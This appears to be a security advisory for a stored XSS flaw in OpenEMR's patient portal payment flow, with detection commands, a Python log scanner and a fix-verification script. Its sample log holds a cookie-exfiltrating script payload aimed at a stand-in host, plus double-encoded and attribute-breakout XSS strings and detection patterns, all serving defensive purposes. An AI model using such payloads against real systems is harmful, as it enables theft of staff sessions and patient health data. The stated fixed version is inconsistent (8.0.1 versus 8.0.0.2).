Platform
php
Component
openemr
Fixed version
8.0.1
CVE-2026-33346 describes a stored cross-site scripting (XSS) vulnerability in the OpenEMR patient portal payment flow. A patient portal user, i.e. a low-privilege patient account, can submit a payment whose fields carry arbitrary JavaScript; the payload is persisted and later executes in the browser of the staff member who reviews the submission, inside that staff member's higher-privileged session. This can lead to account compromise or data theft. The vulnerability affects OpenEMR versions prior to 8.0.0.2, and the fix is available in version 8.0.0.2.
The impact is significant because the payload runs in the context of a staff user's session. An attacker could read patient data the staff user can access, including Protected Health Information (PHI), perform actions in the staff user's name (for example, altering payment records), or attempt session takeover. Note that stealing the session cookie outright requires it to lack the HttpOnly flag, but actions driven through the victim's browser do not depend on that. Because the payload is stored, it persists and can affect every staff member who views the record until it is removed. Successful exploitation could lead to regulatory penalties (HIPAA), reputational damage, and disruption of healthcare services. XSS in healthcare applications is a well-understood attack vector precisely because the user who reviews patient-submitted data typically holds clinical or administrative privileges.
CVE-2026-33346 was publicly disclosed on 2026-03-19. There is currently no indication of active exploitation in the wild, and it is not listed on the CISA KEV catalog. The availability of a public proof-of-concept is currently unknown. Given the relatively recent disclosure and the potential impact, organizations should prioritize patching to prevent potential exploitation.
Healthcare organizations running OpenEMR with the patient portal enabled, and whose staff review portal payment submissions, are at risk. Organizations on older OpenEMR builds or with limited security expertise are especially exposed. An XSS payload executes within the origin of the vulnerable instance, so on shared hosting other OpenEMR instances on the same server are affected only if they share an origin or the same staff credentials.
• php: Review portal/lib/paylib.php and portal/portal_payment.php for payment fields that are written into HTML without going through OpenEMR's text()/attr() escaping helpers. Listing the output statements is a quick starting point; the source files themselves will not contain a "<script" payload, because the stored payload lives in the database, not in the code:
    grep -nE 'echo|print|<\?=' /path/to/OpenEMR/portal/lib/paylib.php /path/to/OpenEMR/portal/portal_payment.php
• php: Monitor web-server access logs for requests to the payment flow whose query string carries script markup. Standard access logs record only the request line, so a payload sent in a POST body will not appear here, and the journalctl form only works if Apache logs to the journal (by default it writes to /var/log/apache2):
    grep -i 'portal_payment.php' /var/log/apache2/access.log | grep -iE '%3Cscript|onerror|javascript%3A'
    journalctl -u apache2 -f | grep -i 'portal_payment.php'   # assuming Apache, logging to journald
• generic web: Monitor access logs for requests containing suspicious JavaScript payloads targeting the payment portal, allowing for URL-encoded and double-encoded variants.
• generic web: Check whether the portal sends a Content-Security-Policy (CSP) header; a policy that disallows inline script limits what a stored payload can do even before patching (replace the host name with your own instance):
    curl -sI https://openemr.example.org/portal/ | grep -i content-security-policy
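The access-log check above, worked through as an added example that is not part of this advisory or of OpenEMR: a small Python scanner over constructed Apache combined-format lines. It decodes each query-string parameter of requests to /portal/portal_payment.php, including double-encoded ones, and flags script markup. The log lines, IP addresses and the watched path set are constructed assumptions; the POST line is included to show the blind spot, since access logs do not record request bodies.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format. Matching stops after status and size, which is
# all the scan needs; referrer and user-agent are ignored.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Payment page named in the advisory. paylib.php is an include, so only the
# page script is watched here (assumption).
WATCHED_PATHS = {"/portal/portal_payment.php"}

# Indicators of script injection in a decoded parameter value.
XSS_INDICATORS = (
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*(img|svg|iframe|body|input|details)\b[^>]*\bon\w+\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
)

# Constructed sample lines (not real traffic). Line 2 is a URL-encoded payload,
# line 3 is double-encoded, line 4 is a POST whose body the access log never
# records, line 5 targets a path outside the payment flow.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Mar/2026:10:15:01 +0000] "GET /portal/portal_payment.php?amount=25.00&memo=copay HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Mar/2026:10:16:44 +0000] "GET /portal/portal_payment.php?amount=1&memo=%3Cscript%3Efetch%28%27//x.test/%27%2Bdocument.cookie%29%3C/script%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Mar/2026:10:17:02 +0000] "GET /portal/portal_payment.php?memo=%253Cimg%2520src%253Dx%2520onerror%253Dalert%281%29%253E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Mar/2026:10:18:10 +0000] "POST /portal/portal_payment.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Mar/2026:10:19:00 +0000] "GET /interface/main/main_screen.php?x=%3Cscript%3E HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (a common filter-evasion trick) until stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a finding dict for a suspicious request to the payment flow, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path not in WATCHED_PATHS:
        return None
    hits = []
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already performed one round
        if any(p.search(value) for p in XSS_INDICATORS):
            hits.append((key, value))
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "method": m.group("method"), "hits": hits}


def scan_log(text):
    """Scan a whole log; returns the findings in file order."""
    return [f for f in (scan_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["method"], finding["hits"])
```

Run against the sample, the scanner reports the two GET requests with encoded payloads and stays silent on the POST, which is exactly the case a stored-XSS submission will usually take; for that path the reliable signal is the staff-side record itself, not the access log.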
disclosure
patch
Exploitation status
EPSS
0.04% (14th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-33346 is to upgrade OpenEMR to version 8.0.0.2 or later. If upgrading is not immediately feasible, the stopgap is output encoding at render time: every payment field that portal/lib/paylib.php and portal/portal_payment.php write into HTML should pass through the escaping helper appropriate to its context (HTML text versus attribute value), since input validation alone will not neutralize a payload that has already been stored. A web application firewall (WAF) with XSS rules scoped to the patient portal endpoints adds a layer of protection, but encoding variations can bypass signature rules. Review OpenEMR and web-server logs for suspicious activity around patient portal payments and feed them into existing security monitoring. After upgrading, confirm the fix in a test environment: submit a payment carrying a known JavaScript payload through the portal, then open the submission as a staff user and verify that the payload is rendered as escaped text (for example &lt;script&gt;) and does not execute.
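To make the "confirm the fix" step concrete, here is an added verification example, not OpenEMR's code. It contrasts a hypothetical vulnerable renderer (stored memo text concatenated into HTML) with one that applies output encoding, and judges the result the way a browser would: by parsing the HTML and looking for a <script> element or an on* handler attribute, rather than string-matching the payload. The renderers, the memo field and the canary strings are assumptions for illustration; in a real check the canaries are submitted through the portal and payload_is_live is run over the staff-side page as served.

```python
import html
from html.parser import HTMLParser

# Constructed canaries, one per output context. None is a real exploit string for
# OpenEMR; each only sets a harmless flag if it executes.
CANARIES = {
    "text_node_script": "<script>window.__canary=1</script>",
    "text_node_handler": "<img src=x onerror=window.__canary=1>",
    "attribute_breakout": '" autofocus onfocus=window.__canary=1 x="',
}


class _Collector(HTMLParser):
    """Records start tags and on* event-handler attributes as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [(tag, n) for n, _ in attrs if n.lower().startswith("on")]


def payload_is_live(rendered_html):
    """True if the markup contains a <script> element or an on* handler, i.e. script would run."""
    c = _Collector()
    c.feed(rendered_html)
    c.close()
    return "script" in c.tags or bool(c.handlers)


# Hypothetical renderers for a payment memo field (not OpenEMR's code). The first
# mirrors the vulnerable pattern: stored text concatenated into HTML verbatim,
# once as a text node and once inside a double-quoted attribute.
def render_vulnerable(memo):
    return f"<td>{memo}</td><input name='memo' value=\"{memo}\">"


# The fix: output encoding at render time. html.escape(quote=True) encodes
# < > & " and ', which is sufficient for both an HTML text node and a
# double-quoted attribute value.
def render_fixed(memo):
    safe = html.escape(memo, quote=True)
    return f"<td>{safe}</td><input name='memo' value=\"{safe}\">"


def verify(render):
    """Names of the canaries that would still execute under the given renderer."""
    return [name for name, payload in CANARIES.items() if payload_is_live(render(payload))]


if __name__ == "__main__":
    print("vulnerable:", verify(render_vulnerable))  # all three canaries survive
    print("fixed:     ", verify(render_fixed))       # []
```

The attribute_breakout canary is the one most often missed: a renderer that escapes only < and > still lets a double quote close the attribute and inject an onfocus handler, which is why the fixed renderer encodes quotes as well.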
Upgrade OpenEMR to version 8.0.0.2 or later. This version fixes the stored XSS vulnerability in the patient portal payment flow.
CVE-2026-33346 is a stored cross-site scripting (XSS) vulnerability in OpenEMR's patient portal payment flow, allowing attackers to inject malicious JavaScript.
You are affected if you are running an OpenEMR version prior to 8.0.0.2 with the patient portal enabled.
Upgrade OpenEMR to version 8.0.0.2 or later. Consider temporary workarounds like input validation and WAF rules if immediate upgrade is not possible.
There is currently no indication of active exploitation in the wild, but organizations should prioritize patching.
Refer to the OpenEMR security advisories page for the latest information: [https://www.openemr.org/security/](https://www.openemr.org/security/)